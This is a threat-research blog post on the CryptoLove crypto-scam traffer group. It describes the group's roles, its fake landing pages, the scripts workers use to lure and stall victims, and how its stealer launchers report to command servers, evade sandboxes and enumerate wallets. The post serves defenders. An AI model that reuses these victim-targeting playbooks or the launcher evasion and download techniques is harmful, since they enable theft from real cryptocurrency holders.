This blog was written in collaboration with @g0njxa ❤ Together, we will explore the CryptoLove traffer’s team and look into their methods of operation.

Key Takeaways

• CryptoLove is a traffer’s group specializing in crypto scams for over two years, recruiting workers to spread stealers through custom launchers and loaders that can track every stage of payload delivery.
• CryptoLove has a hierarchical structure with roles like developers, mentors, and profit handlers.
• Workers aren’t allowed to scam in CIS countries or sell logs.
• Tools provided include 3+ stealers like LummaC2, StealC, and Rhadamanthys for Windows and AMOS Stealer for MacOS.
• Workers use Discord, Telegram, and even alternative platforms like Bluesky to find victims.
• To appear credible, workers purchase verified social media accounts (e.g., Twitter with blue checkmarks starting at $15).
• Affiliates of CryptoLove operate dedicated landing pages often disguised as gaming platforms, PDF readers, or messaging and meeting software platforms.
• Affiliates leverage fake NFT collections, job listings, and even fake tokens to establish trust and manipulate victims into running the launchers.
• Over 22,000 unique IP logs have been recorded, with workers receiving payouts from funds stolen worldwide.

Case Study

The name CryptoLove might suggest a dating app, but it’s actually a traffer’s group that’s been operating for over two years and specializing in crypto scams. They are actively recruiting individuals to spread stealers through custom-written launchers, using various methods, including scams, to achieve their goals.

The CryptoLove team provides numerous affiliates for each worker that we will cover in this blog post.

There are a few rules that the group has mentioned:

• They don’t work in CIS countries
• They don’t sell logs
• AFK/Toxic/Unstable behavior is prohibited

Tools that are offered:

• 3+ stealers (these are usually LummaC2, StealC and Rhadamanthys stealers)
• Automatic withdrawals from victims’ cryptowallets (starting from $100, no fees to workers)
• MacOS stealer for victims that don’t use Windows OS

Payouts:

• Payouts range from 50% to 65%, depending on the affiliate. Top performers receive an increased percentage.

The top amount of payouts the users made are shown in the screenshot below.

RTFM

In the world of crypto scamming, victims are sometimes referred to as “mammoth” or “hairy; the “hairy” term is likely derived from “mammoth.” These labels are part of the specific jargon used within scamming circles among native Russian speakers. And scammers are called “workers”.

So how does it all work?

CryptoLove team calls their work NFT Scam, which they define as a type of fraud where the perpetrator gains access to internal files on the victim’s computer by infecting it with a virus.

After joining the team, users select any branch to work with, as detailed in this blog. Users can opt for several branches at once or focus on those they prefer. Each branch maintains its chat and a landing page featuring social media accounts. Notably, there is a launcher download button on the website itself; activating this launcher initiates the loading of a virus.

Once a user has selected a branch, they must familiarize themselves with the project. This involves studying the social media platforms, the website, and the available documentation. All relevant links will be provided in the pinned message of the branch’s chat. A key objective for users is to thoroughly understand the core idea of their chosen branch to competently address any questions potential victims might have about the project.

First of all, the worker needs a social media account where they can talk to the victim. The worker can purchase Twitter, Discord, Gmail, and Instagram accounts from the provided store on Telegram called Alpha Store.

The worker chooses what fits their budget at the moment. The most costly is a Twitter account — starting from $15 (with a blue checkmark). A checkmark on Twitter is now mandatory; without it, they can’t write to most victims. For Discord, Telegram, and Instagram, the prices range from $1.

The examples of Twitter and Discord accounts controlled by workers are shown below.

The most relevant for scamming activity at the moment are Discord and Twitter. Due to the recent events in November 2024, traffers are aware of the rapid growth of alternative social media such as Bluesky and have started acting towards users of these platforms. BlueSky has emerged as a significant counterpart to the blocked social network X, gaining substantial popularity in Brazil. The platform’s unique appeal stems from its accessibility in a region where network X faces restrictions, attracting a substantial user base, including high-profile influencers who have migrated from network X. According to one of the affiliates, “Yes, it is worth it. I found one of my profitable Brazilian contacts on Bluesky, after which I moved the conversation to Discord”. CryptoLove administration constantly shares with its team affiliates about new scam opportunities following global trends and news.

It is a common practice to share workers’ accounts between Cryptolove users on Telegram channels to create fake engagement between them and make the accounts even more reliable.

After purchasing an account for spamming and setting up the device from which they will be working, their next step is to find a victim with cryptocurrency (a victim from any country except the CIS). Once they find such a victim, they need to start communicating with them, whether the communication style is immediately business-like or casual on any popular topics. The outcome should be the same: their victim must visit the website of their branch and download the launcher. Before sending the victim to download the launcher, they must find their balance so they don’t waste time. The chance that a victim has money without balance verification is like winning the lottery, according to CryptoLove. They have experienced this, having made 2–3 daily logs. After 14 days of unsuccessful work, when they began to ask for the victim’s wallet address, they immediately filtered out the ones without money and did not waste time on them. When they started asking for the victim’s wallet address (for example, for salary purposes), they found themselves a victim with money, got them to download the launcher, and made a profit in 2 days.
When their victim downloaded the launcher from the branch’s website (for example, for game testing, signing an employment contract, reviewing the game, getting an ID for verification, etc.), the worker will see a notification in one of the affiliates’ channels about the launcher download from the victim. And they will know by timing that this is their victim. After that, the victim launches the launcher on their device. So, the worker will be informed about all the victim’s actions from the victim’s launcher. A launch notification comes in when the victim launches the launcher on their PC. When the victim presses any button — a notification of the press comes in. The final stage, “File Opened”, is the malware launched on the victim’s PC. This launcher feedback works only for the Windows version. There is no launch notification for MAC OS — the log with data comes immediately.

With the recent updates as of November 2024, some affiliates have transitioned to using promo codes tied to individual workers. Each worker generates a unique link associated with their account and shares it with the victim. When the victim visits the page, clicks the download button, and executes the launcher, the system notifies the worker, and all logs are attributed to that specific worker.

So, the file is successfully launched. What now? The victim will receive an error in a few minutes (a special kind of error so that the victim suspects nothing :))

The worker must tell the victim it’s a temporary error, and the server is overloaded. They will contact the developer of the project and write to them later. Or, at this stage, they can refer to the possibility that the game is blocked in their country and try to find out where the victim is from.

The data will arrive in the log channel after some time, usually 5–20 minutes. The time depends on the victim’s internet speed, the size of the log, etc.

The structure of the logs:

• number of passwords (one of the passwords/keys needed to decrypt the files of the victim’s crypto wallet)
• number of cookies
• wallets: number of crypto wallets

Now, the worker would have to wait while the log handler (log worker) checks the log and extracts the crypto.

The description of the status on the logs:

• Status “Waiting for verification” — the log is under review.
• Status “Empty” — empty wallet.
• Status “Waiting for proofs” — the worker must send proofs to the worker

The proofs can be the following:

• The victim’s username
• The screenshot shows that the worker is logged into the account from which they wrote to the victim
• Nickname from the bot (bot Cryptolove #….) and the landing page (the website to which the worker directed the victim)

On Mac OS, the launch is slightly different; the victim would have to:

1. Open the file.

2. Right-click on the icon in the center of the opened launcher.

3. Launch by clicking OK in the pop-up window.

4. Enter the password.

The log looks roughly like this:

After the log from the victim arrives, if everything goes well, there is a password and the wallet tags in the log. Then, the worker will see their money leave the victim’s wallet. In the channel, after successfully withdrawing all of the victim’s crypto assets, a message will appear in the worker’s log.

The CryptoLove team and other affiliates have manuals on social engineering. Usually, the workers use the following methods to engage with the victims:

• Discord communications, the worker looks for Discord channels on DappRadar, a platform that provides insights, analytics, and tracking services for decentralized applications (dApps) and blockchain-based projects. The worker then chooses one of the projects and navigates to their Discord channel. Next, they would message the project’s admins, holders, or users with Nitro subscriptions (since they are more likely to have money) or users with usernames ending in .eth, as their balance can often be checked via zapper.xyz, which is a decentralized finance (DeFi) and Web3 management platform that helps users track, manage, and interact with their crypto assets.

The workers can also leverage other platforms for Discord communications, for example, just a simple Google search with the terms “new crypto servers on Discord”, YouTube, Best Upcoming NFT Projects, Coinmarketcap, Coinglass, and many more.

• Telegram communications: the worker searches for “.eth” on Twitter. Pick any account and check their wallets on zapper.xyz. The .eth address from the zapper is then copied CryptoLove DeBank bot or to the DeBank directly to obtain the balance. Besides the “.eth” term, the workers also search for “wallet address” on Twitter. Platforms such as Coinmarketcap and Coinglass can also work for Twitter.

• Telegram communications: the worker accesses cn.tgstat.com/ru/ratings/chats, which contains the list of Telegram channels. The worker would choose the Crypto channels from the categories and pick the victim to target. Again, Coinmarketcap and Coinglass can also work for Telegram.

In the past, from August 2023 to October 2023, the CryptoLove bot received notifications about new logs accompanied by screenshots from the victims. The team became highly motivated and creative, even attempting to persuade freelancers on WhatsApp, Skype, or UpWork to download and run the launcher.

There are also fake job recruitment posts on platforms such as Latium, Freelancer, and Hyve. These posts aim to lure victims into downloading and running launchers or connecting their crypto wallets to fraudulent websites. Ultimately, this gives the perpetrators control over the wallets, intending to drain the funds (Figures 12–14).

Now we hope you have an idea of how it all works in a nutshell; let’s look at Crypto Love’s affiliates… CryptoLove Cupids or Should We Call It Staff?

The CryptoLove team comprises a few members who are responsible for the main tasks:

• LanRock (@lanrock_dev) — the developer of for CryptoLove.
• Routine (@RoutineLove3) — the support and “ОТРАБ” for CryptoLove, which means the person responsible for sorting out and parsing the logs. Work 12–16 hours per day.
• SS (@sssmmmnu)—support. SS describes how he became a support for CryptoLove: “It was a very long and difficult journey, a true test of endurance, and of course, I provided substantial help to the workers and the team.”
• Kupidon (@kup1donLove3) — support, joined CryptoLove in 2022.
• Oscar (@magnificent_oscar) — BIG SUPPORT, the owner of Mr. Beast. Oscar has been with the team since 2022 and loves playing GTA at night, cars, and adrenaline. Before joining the scamming industry, he was a construction worker.
• Querteo (@yellowscam) — landing page developer, the owner of SCAMQUERTEO / YELLOW EMPIRE team; one of his projects is ARGON. He brags about the first landing page he created, which had a turnover of about $30,000 in 2–3 months.
• Pink (@PinkorexxLove3) — mentor, previously participated in cold calling (social engineering calls) was brought into the CryptoLove team by her ex-boyfriend who wanted to steal money from her. Before scamming industry, she worked for her parents in the real estate industry and then as a freelance translator. Pink currently lives in Israel.
• Xamster (@sup_xam) — mentor, support. Prior to joining CryptoLove, he participated in airdrops with his previous team and got whitelists (In the context of cryptocurrency, NFTs, or other online projects, whitelists (WL) refer to exclusive pre-approval or access lists that allow individuals to participate in an event or claim rewards). Airdrops in the context of cryptocurrency refer to the distribution of free tokens or coins to users as part of a marketing campaign or blockchain project launch. In the scamming industry, airdrops are fraudulent schemes. Workers promise free cryptocurrency tokens to lure victims into providing sensitive information, such as private keys, or to send a “fee” to claim the fake reward.
• MxDuke (@mrxuyux) — the top profit maker on CryptoLove and the Profit Team owner. The most significant profit was over a year ago, around $55,000. MxDuke says, “When I saw the money starting to move out of the wallet, I was just in shock. While the wallets were being emptied, I smoked half a pack of cigarettes, but then I started feeling nervous, thinking they’d come after me any second. Oscar helped clean the money, though, and after a week, I calmed down — until then, I was a nervous wreck. The target was easy to hook, with just three SMS messages. As for the money, I withdrew a small portion in cash for personal needs, put some into developing “Orbit,” and left the rest sitting in crypto” (Orbit is the landing page or project on Profit Team).

The messages the workers usually send to the victim would look like the ones shown in the screenshots below.

Hiring victims into the crypto projects:

Hiring for beta testing:

CryptoLove Landing Pages and Affiliates

Each affiliate has multiple landing pages that users can use for scamming purposes. These landing pages contain the download links for launchers based on the user’s operating system. The landing pages can be anything from fake Zoom installers to PDF Readers. In this section, we will cover some of the landing pages CryptoLove affiliates use.

SCAMQUERTEO TEAM or YELLOW EMPIRE

The affiliate has a turnover of 650957.2$.

This affiliate has had the following landing pages in the past:

• FATO (PDF LAND) — fake PDF reader
• ZOOM LAND
• GOOGLE MEET LAND
• ARGON GAME 2.0 — gaming landing page

Note: “LAND” stands for a landing page.

Examples of the download chains are shown below. The data sent to the server includes terms related to crypto wallets, such as “metamask” and “phantom” which suggests a default configuration, as some of the landing pages may contain wallet drainers, which are malicious tools designed to transfer funds from a user’s wallet to a worker’s account without authorization.

For some landing pages, the user has to generate a personal link to the landing page from one of the Telegram bots, such as the Zoom and Google Meet landing pages.

This CryptoLove affiliate also provided a fake Zoom landing page, but at the time of writing this report, the service to this landing has been terminated, along with Google Meet.

At one point, the Google Meet landing page prompted the victim for permission to access the device’s camera and take a photo. The captured face images have been blurred for privacy purposes.

In addition to using fake PDF readers, Zoom, and Google Meet landing pages, CryptoLove affiliates, including YELLOW EMPIRE, also employ gaming-themed landing pages such as Argon 2.0, also known as Genom. Workers can lure the victims into being beta testers of the game, for example.

Translation of Argon 2.0 announcement:

ARGON 2.0

We’ve all been waiting for this for so long, and now the day has come! I’m thrilled to present ARGON LAND 2.0 (GENOM).

What have we done?

We’ve redesigned the website and changed its functionality. Additionally, a lot of new features have been added, which you’ll see soon.

What’s coming next?

As a teaser, I’ll say this: right after ARGON 2.0 is launched, we’ll start working on creating more features. For example:

– Bot functionality: Bots will handle everything on their own.

– Launcher development: The launcher for landing pages is already in progress and will be ready soon.

– Game trailer: The game trailer will also be ready in the coming days.

Broker Panel

This event introduces a new tool called the “Broker Panel”. With it, you’ll be able to track your profits, landing pages, social media, and much more. Also, suggestions for additional functionality are welcome!

Onwards to new profits and adventures!

Even the name of the Argon project founded by CryptoLove in 2023 is present in the new Genom website as a reminder to CryptoLove workers.

The logs (otstuk) from Genom / Argon 2.0 launchers are shown below.

The affiliate uses a bot capable of generating and sending fake BNB tokens to the profile created by the user on the Genom/Argon 2.0 platform. The goal is to make the user feel invested and excited enough to run the malicious launcher.

The affiliates invest significant time in creating these landing pages, managing social media accounts, and promoting them; they even have their own cute NFTs, as shown below.

Interestingly enough, the affiliate has previously registered the company on Companies House services as Genom LTD, which was later changed to DRAGONBORN LTD.

Please note that Dragonborn is another scam project under CryptoLove managed by affiliate Mr. Beast Team.

Wolfs of Wall Street Team

The affiliate has a turnover of 300270$

The Wolves of Wall Street currently has two main projects: gaming landing pages with social media profiles (Orionix and Dinoverse). The affiliate is planning a rebranding soon.

How Wolves of Wall Street advertises the Dinoverse project:

• The Dinoverse project features a fantastic metaverse with its merchandise, real documents, and official registration in the UK.
• The project offers a wealth of top-notch and unique materials, including NDAs, custom designs, and more.
• It has UK licenses with engravings and authentic holographic DocSecure.
• Highly promoted social media (Twitter with a Gold Checkmark, Discord, Link3, Linktr, Medium, Telegram, YouTube, OpenSea, and more).

The logs from Dinoverse launchers are shown below.

It is also registered as a business in Georgia (United States) and as UNI Enterprise, LLC, as shown below.

The Dinoverse administration also created its merchandising and shared a real-life photo shoot to give credibility to the project.

Below is the Linktr for the Dinoverse project.

Orionix project:

• The Orionix project is a gaming landing page with a space theme.
• The project includes extensive materials, including a Discord channel.

The logs from Orionix launchers are shown below.

Orionix affiliate claims the business is registered in Florida, United States. However, the document provided is fake.

The administration behind Orionix made a photo shoot using its merchandising to gain user credibility.

Below is the Linktr for the Orionix project.

Please note that both fake gaming landing pages created by Wolves of Wall Street serve no purpose but to provide a fake download button, which delivers the malware launcher for CryptoLove.

Additionally, this group operates two landing pages that impersonate video-meeting software, such as Zoom and WeChat. Each user can generate a personalized page under a shared domain linked to their Telegram username through a team-managed bot. These pages are designed to trick users into downloading the launcher.

While writing this blog, both fake meeting software landings have been terminated.

Another landing provided by Wolves of Wall Street is a suite of web3 browser-based tools named “Toffee”, which is promoted on three websites:

Crypto Tools — Here, you’ll find all crypto applications, exchanges, wallets, services, token sales, marketplaces, AI services — all brought together into one powerful crypto tool that’s incredibly convenient for anyone navigating the crypto world!

Crypto Calendar — Here, you’ll find all crypto applications, exchanges, wallets, services, token sales, marketplaces, and AI services — all combined into a comprehensive crypto tool that’s super convenient for anyone in the crypto space!

The promotion from the affiliate for Crypto Research / Toffee Research:

Here, you’ll find all the latest news, media leaks, flashes, and micro-updates from the cryptocurrency world — covering everything from no-name projects to top-tier ones. For example, a mammoth might want to track the NN project and set up notifications for any media leaks to decide when to buy or sell the project’s tokens. Yes, it’s super convenient and, once again, a great hook!

Welcome!

Like all landing pages in this team, Toffee suite have no other functionality than serving the launcher.

PROFIT (ПРОФИТНЫЕ) Team

The affiliate has a turnover of 966542.0$

Currently, the PROFIT Team is working on leading projects, both gaming-themed landing pages — Whales Project and Orbit Project. This affiliate has the following landing pages.

Users can either download the fake game (launcher) directly or create an account on the site, where, like Genom / Argon 2.0 landing from Yellow Empire, the Profit team worker can send fake tokens to the victim account through a bot to create reliability in the project.

Cosmo Whales has its own company in Company House.

The affiliates of this team also created an NFT collection for this project.

The Orbit project is also a fake game landing that was inspired in WarUniverse: Orbit of Cosmos, an MMO game about Space.

This landing does not work as well as Cosmo Whales because the website only provides a download button, and the gameplay featured on the website is just stolen clips from videos of the gaming YouTuber “MrZarokk”.

Even MxDuke, the staff of the PROFIT Team, is included on the website as the founder of the Orbit Unit game as an “experienced blockchain and DeFi specialist.

And the last landing provided by the Profit team is a fake PDF Reader named VeriScroll. In the past, it was known as Verdascript.

The profit team has a general channel for logs for all three landings:

Heaven Era 2.0 Team

The affiliate has a turnover of 535334$

This affiliate had the following landing pages in the past:

• CRYPTIC CAVE (WEB3 GAME LAND)
• LINKUP (MEETING SOFTWARE LAND)

This game was also listed on the Magic Square web3 app store, introduced as “a unique RPG where you become a young adventurer stranded on a mysterious island!”.

The logs from Cryptic Cave launchers are shown below.

The LinkUp landing features a fake meeting software, as shown below.

Mr. Beast Team

The affiliate has a turnover of 31680$

This affiliate has had the following landing pages in the past:

• DRAGONBORN (WEB3 GAME LAND)
• DOCULUMA (PDF READER LAND)

The Dragonborn Landing page features a fake game about dragons, as shown below.

As shown below, Dragonborn claims to partner with some companies, such as Vespertine Capital, HUBGlobal, or RedHat.

Dragonborn also falsely claims to be managed by Steven Wolfe Pereira, a Chief Client Officer for TelevisaUnivision’s U.S. Advertising Sales, using his image without authorization.

This landing page has also created the Dragonborn token ($DBT), which is available and already flagged on PancakeSwap. Additionally, the token is highlighted on the website as a fake token labeled vDBT.

This landing page offers users a direct download option and the ability to create an account by connecting their MetaMask wallet. By connecting to the site, users can access features such as a messaging system for communication between Dragonborn users, a fake NFT inventory, a fake job advertisement section (where users can apply by submitting their full name, country, email, and CV document), and a ticketing system for reporting issues.

For team affiliates, a custom administration panel called AdminDragon was developed by CryptoLove’s developer, Lanrock. It is a fork of AdminLTE 4.0.0-beta2. Credentials for accessing this administration panel are generated through a team-managed bot.

It is possible to send a fake amount of vDBT to any user connected to the website and send HTML code to his profile due to bad sanitization of requests.

So, we sent some love to CryptoLove users on the website too, nothing special …

According to Mr. Beast’s administration, the AdminDragon panel includes an option to drain connected user wallets by activating them with a button. Once activated, the user must swap the received vDBT tokens to their preferred cryptocurrency on the landing page using the connected wallet. This action is assumed to trigger the drainer. The drainer reportedly used for these operations is allegedly known as Angel Drainer.

When writing this blog, there are allegedly 258 users with connected wallets. These wallets can be viewed in the Mr. Beast log channels. The draining functionality needs to be operational when writing this blog, and there is no record of any successful draining in the Mr. Beast draining log channels. Therefore, the functionality of this feature could not be confirmed.

Workers of the Mr. Beast Team can request its affiliates a custom corporate email (@dragonborn.org) in order to carry out their scamming activities in a more professional way and make the victim believe that the project is a legitimate one. Communications with victims may also be carried out through these corporate emails, avoiding suspicions. The mail service being used is VK Workmail (from mail.ru).

The logs of Dragonborn are shown below.

The other landing provided by Mr. Beast is a fake PDF Reader named Doculuma.

Like other PDF Reader landings provided by CryptoLove affiliates, the most common method to get users to download these fake software is by sending them a PDF file containing a locker banner from the PDF Reader.

How the affiliate would describe the process of luring victims into downloading the launcher via the PDF reader:

The PDF file is not a launcher. It’s an encrypted PDF file, and when opened, the mammoth (target user) sees the following:

• For the mammoth to supposedly open this PDF file, he must install a PDF reader. Logically, the mammoth types the query into Google (for example, the query, the name of our site is different): “verdascript” — “verdascript pdfreader” and so on, and sees this picture.

Mr. Beast’s manual on how to work with it:

1. You can introduce yourself as always, an employee of one of our landing pages, and instead of guiding him into the channel in Discord, you ask questions, introduce him to the project, and then ask if he’s ready to sign the contract then you can send him the launcher.

2. It is the same as the first method, but instead of sending the PDF file to the mammoth via Discord/Twitter/Telegram, you ask him for his email and tell him you’ll send him the employment contract. Write to the support or the branch owner that you need the corporate email, and from there, you send the file. The mammoth sees that you are an employee because you have the project’s corporate email and the trust level increases.

ObmanVALUT Team

The affiliate currently has a turnover of 77404$.

This affiliate features a fake meeting software named “NexCall”.

The affiliates of this team can provide their workers with a corporate email (@nexcall.us), similar to Dragonborn described previously.

The logs of Nexcall are shown below.

CAPS LANDS Team

The affiliate has a turnover of 10774$.

This affiliate has the following landing pages:

• CAPSURE LABS (WEB3 SOFTWARE LAND)

The landing page serves the launchers via the promo codes workers provide to the victims.

Upcoming landings

In November 2024, the CryptoLove Team added two additional affiliates — Untitled Team and XMAS Team. It’s worth noting that the XMAS Team was previously part of Marko Polo’s trafficking team, which was recently shut down because his coder stole 2.5 million dollars worth of GIGA memecoin tokens from a Mac OS log that the automatic checker of Marko Polo staff could not detect. TXMAS Team and their workers have been active under the Marko Polo traffer’s group for several months, operating as their affiliate with their landing pages “Galaxy” and “MOW,” which can’t be attributed to any source while writing this blog. While they are actively adapting to the new CryptoLove administration, the landings offered by this team remain unknown.

Untitled Team offers a forum at xona[.]gg, a copy-paste of kingz[.]net forum. The staff of this team is actively developing this landing and shared the intentions about how they wanted it to be.

While this functions as a fully operational forum, affiliates of the Untitled Team have two methods to trick victims into downloading malware. The first method involves directly downloading the forum’s XCLIENT launcher, a customized variant of the CryptoLove launcher. Victims are deceived into believing that the code they input into the launcher is a 2FA authentication code (the developer made a typo on the landing page to enable the authentication). In reality, it is the personal invite code for the CryptoLove worker. At the time of writing, this functionality is still under development.

The second method for infecting the victims with a launcher involves introducing a simulated calling feature within the forum’s user messaging system. When one user attempts to call another, a fabricated notification will appear, claiming an issue with their microphone. The suggested solution will prompt users to download specific “driver updates”. However, this will initiate the download of the CryptoLove launcher. This feature is currently in development and redirecting users to the download page of the XCLIENT mentioned previously.

The affiliates of this team have also created a Telegram mini-app that displays the Xona forum and will let the users use the forum directly inside Telegram.

CryptoLove Launchers

Note: When writing this report, the launchers drop Rhadamanthys and StealC for Windows and AMOS Stealer for MacOS. You can find the configuration extractors for StealC and the newest AMOS version here.

Before we start analyzing the launchers, it’s worth noting that we have successfully reported the few EV certificates that were used to sign the malicious launchers, including:

• Chengdu Yihui Weimeng Network Technology Co., Ltd (Thumbprint: 7EB4CA2952EB958E894D4AC48971BA930F22D29F)
• Shenzhen Xinshitong Network Technology Co., Ltd (Thumbprint:
  8F44A139359DDB9310C681526C560F207B706115)

CryptoLove was using MSIX for the launchers at some point around October 2024 and then switched back to executables.

In September, CryptoLove was using launchers that were not bundled. Upon executing the launcher, the infected machine executes the sendstart() method. The sendstart() and other related functions (sendclick, sendclick1) are mechanisms used by the launcher to report certain events or user interactions back to a command and control (C&C) server. The sendclick2() is also implemented in the binary but is not being used.

The method sendstart() is responsible for reporting a launch action to a remote server, which is hxxp://xilloolli.com/api[.]php. The POST request is constructed using the following:

• Base URL mentioned above.
• status=1 indicates the event type (in this case, a “launch”).
• wallets=, which calls MainWindow.Wallets() to the number corresponding to the wallet extension(s) detected on the victim’s machine.
• av=, which calls MainWindow.GetAntivirus() to retrieve information about the antivirus software installed on the machine. The GetAntivirus method attempts to identify installed antivirus products on the system by querying the WMI (Windows Management Instrumentation) repository for the AntivirusProduct class in the SecurityCenter2 namespace. So, if, for example, both “Windows Defender” (ID: 1) and “Kaspersky Total Security” (ID: 2) are found, it will return “1,2”.

The list of wallets being enumerated:

• MetaMask: fhbohimaelbohpjbbldcngcnapndodjp
• Phantom Wallet: aeachknmefphepccionboohckonoeemg
• Binance Chain Wallet: hnfanknocfeofbddgcijnmhnfnkdnaad
• Coinbase Wallet: aholpfdialjgjfhomihkjbmgjidlcdno
• Trezor Wallet: dmkamcknogkgcdfhhbddcghachkejeap
• Ledger Live: efbglgofoippbgcjepnhiblaibcnclgk
• Trust Wallet: nkbihfbeogaeaoehlefnkodbefgpgknn
• Math Wallet: fcckkdbjnoikooededlapcalpionmalo
• Guarda Wallet: bfnaelmomeimhlpmgjnjophhpkkoljpa
• SafePal Wallet: opfgelmcmbiajamepnmloijbpoleiama
• Nifty Wallet: fnjhmkhhmkbjkkabndcnnogagogbneec
• Zerion Wallet: aiifbnbfobpmeekipheeijimdpnlpgpp
• Liquality Wallet: opcgpfmipidbgpenhmajoajpbobppdil
• Exodus Wallet: egjidjbpglichdcondbcbdnbeeppgdph
• MyEtherWallet (MEW): ppbibelpcjmhbdihakflkdcoccbgbkpo
• Ronin Wallet: ffnbelfdoeiohenkjibnmadjiehjhajb
• Keplr Wallet: jnlgamecbpmbajjfhmmmlhejkemejdma

Next, the binary checks whether it’s running in sandboxed or emulated environments using the CheckEmulation() method. The check fails if one of these conditions is true:

• Available memory is less than 4 GB (MainWindow.Memory()).
• The current directory is the Root directory (C:).
• The system’s temporary directory (Path.GetTempPath()).
• The executable file name (without extension) is longer than 11 characters.
• The username or machine name matches specific hardcoded values: WALKER, WALKER-PC, John, JOHN-PC.

If the check fails, the method sendclick1() executes to send the response to the server with status=2 (e.g., hxxps://xilloolli.com/api[.]php?status=1&wallets=0&av=1), and the victim would receive a warning about detecting a virtual machine: An attempt to launch a program using a virtual machine was detected. Update rejected (error code: D24VM09).

If the user clicks on “Cancel” from the fake installer window, the sendclick1() also gets triggered, and it sends a request to the server with a status indicating that the Cancel button was clicked, along with other system information like detected wallets or antivirus software.

If the launcher continues with the execution, The PolicyGeneretic() method is triggered, which orchestrates the execution of three tasks (TaskLoad, TaskLoad2, and TaskLoad3) responsible for downloading and executing malicious payloads. It first checks if a folder “microsoftgame” under C:Program Files exists on the system. If the folder does not exist, it creates it. The folder will store the malicious payloads. Next, TaskLoad, TaskLoad2, and TaskLoad3 are executed sequentially, with sleep intervals of 15 seconds and 20 seconds, respectively.

TaskLoad:

• Check if the file (1.exe) already exists in the target directory.
• If the file exists, it deletes it to ensure the latest version is downloaded.
• It reports the download attempt with the download_first_bug() method, the request would look like the following as an example: hxxtp://xilloolli[.]com/api-debug.php?status=2&proc=Intel(R)%20Core(TM)%20i7–9700K%20CPU%20@%203.60GHz&av=1, where proc= would contain the retrieved CPU name of the infected machine.
• It then executes 1.exe from the saved location and sends a success message to the server via sendopen1() and opened_first_bug(), where sendopen(1) would look like the following: hxxp://xilloolli.com/api[.]php?status=4&wallets=1,5,7&av=1,3 and opened_first_bug() would look like hxxp://xilloolli.com/api-debug[.]php?status=3&proc=Intel(R)%20Core(TM)%20i7–9700K%20CPU%20@%203.60GHz&av=1,3 with status=4 and status=3 respectively.
• If the file cannot be executed, the error is logged to the server (error_on_openning_first_bug), where the request would look like the following: hxxp://xilloolli.com/api-debug[.]php?status=11&error=error_message.
• If the file exists but cannot be executed as a fallback mechanism, the launcher reports the issue to the server with status=12 and proceeds to the next task (TaskLoad2).
• If the file doesn’t exist, the launcher reports it to the server with ?status=11&error=No%20File.
• If downloading the payload fails, the launcher logs the error to the server (error_on_downloading_first_bug) with ?status=10&error=error_message and proceeds to the next task (TaskLoad2).

Similar actions are performed with TaskLoad2 and TaskLoad3, but different payloads and status codes are used. Here is the table of the payloads and codes:

Now look at the starter’s MSIX file (9d4302876124b31deca3254bc0d0bfee). The MSIX file contains the embedded executable file named “TinyPatch.exe”. The executable file is a dotnet bundle containing the .NET runtime and all required dependencies within the bundle. The VirusTotal detections for those bundled binaries are typically low.

The execution of the launcher would trigger the method below.

// TinyPatch, Version=3.29.8.0, Culture=neutral, PublicKeyToken=null
// CalculadoraWPF.MainWindow
using TinyPatch.Analizate;
using TinyPatch.Misc;
private async void InitializeAsync()
{
 Send.sendstart();
 Send.sendclick1();
 await Utils.DownloadManagment();
}

In this launcher, the sendstart() method initiates the main operation similar to the previous launcher, while the sendclick2() method is triggered when the user clicks “Cancel” during the payload installation. Upon this action, a POST request is sent to the Command and Control (C2) server with the structure: ?status=3&wallets=0&av=0. This indicates that the installation was canceled (status=3), and no cryptocurrency wallets (wallets=0) or antivirus programs (av=0) were found.

Following the POST request, the DownloadManagement() method is executed, managing the download and execution of the payload as follows:

• The method first verifies if the target file, named 1.exe as specified in the configuration, exists in the specified temporary directory named “LPC”. If found, it is deleted to download a new payload.
• It checks for the existence of the temporary directory. If the directory does not exist, it is created.
• The method then checks for any running process named “1”, corresponding to the 1.exe payload. If no such process is found running:
  – A WebClient is initialized to download data from the pre-configured URL.
  – The newly downloaded payload is saved in the “LPC” directory under the file name 1.exe.

This launcher variant lacks functionalities for enumerating cryptocurrency wallets or antivirus programs. Additionally, it references “gravitiumgame”, a landing page previously used by Heaven Era Team.

In October 2024, CryptoLove updated its launchers by adding a layer of protection using the .NET Reactor while maintaining the same functionality in the launcher.

In November 2024, CryptoLove did a major update for their launcher. According to CryptoLove:

Completely changed the delivery system and the algorithm for loading our payloads. Now, builds are executed exclusively in memory, which removes the need for our builds to be crypted and will also increase the rate of infections 👍. Based on this, each affiliate will now have its build of the stealer.

Yes, calculating the liters of blood that researchers, defenders, and others have sucked out of us would be challenging. In this update, they completely changed the launcher’s operation. From concept — To implementation.

List of changes:

– The system of issuing the launcher has also changed: Now we issue a legitimate installer file that installs the folder with the launcher on the mammoth’s computer on the path they indicate. The folder’s contents will change depending on the branch and its legend. In all branches, there will be a custom launcher with their UI. When installing, the mammoth can either check the “launch the program after installation” and immediately open the launcher, or just open it from the folder.

– Now, to open the launcher, the mammoth needs to enter the personal promo code of the worker. Only after they enter the correct promo code will their payload begin loading. This will significantly reduce the number of detections and make analyzing the launcher almost impossible. The worker must obtain the promo code for a specific branch in the team bot. The promo code is valid only until the mammoth uses it. After the usage, the promo code becomes invalid. Give them a new promo code if you need to reinfect your mammoth. The system looks complicated, but believe me, it won’t add much discomfort to the work. Thanks to this, even getting a build for researchers, antiviruses, or any other analysts who constantly write their articles will be impossible. Hence, the launcher will be significantly cleaner.

– Thanks to the launcher update, you can now directly determine which worker brought in a specific log. A tag of the worker who brought it will be attached to each log. Determining the branch is now one hundred percent accurate, without the “probabilities” that annoyed them and us.

– The stealer has been replaced with a product that provides better feedback and collection. Also, thanks to the feature of the brute force panel for wallets from the log, the number of brutes will decrease.

– Added Anti-Ledger. Yes, that very anti-ledger that other themes advertise as “We f*ck ledgers HURRAH”. All these anti-ledgers always boil down to the human factor of the mammoth, but under the hood, it’s phishing the seed phrase from the original ledger application.”

We are very pleased that our ongoing efforts to disrupt CryptoLove’s work make them sweat. While we’ve successfully figured out their payload delivery methods, we will not disclose our techniques publicly to continue disrupting their operations effectively. But you can always reach out to us for more information.

In November 2024, CryptoLove first released their major launcher update with the same old .NET launcher, removing .NET Reactor, and then completely switched to using DevelNext, which is an IDE (Integrated Development Environment) for PHP based on JPHP.

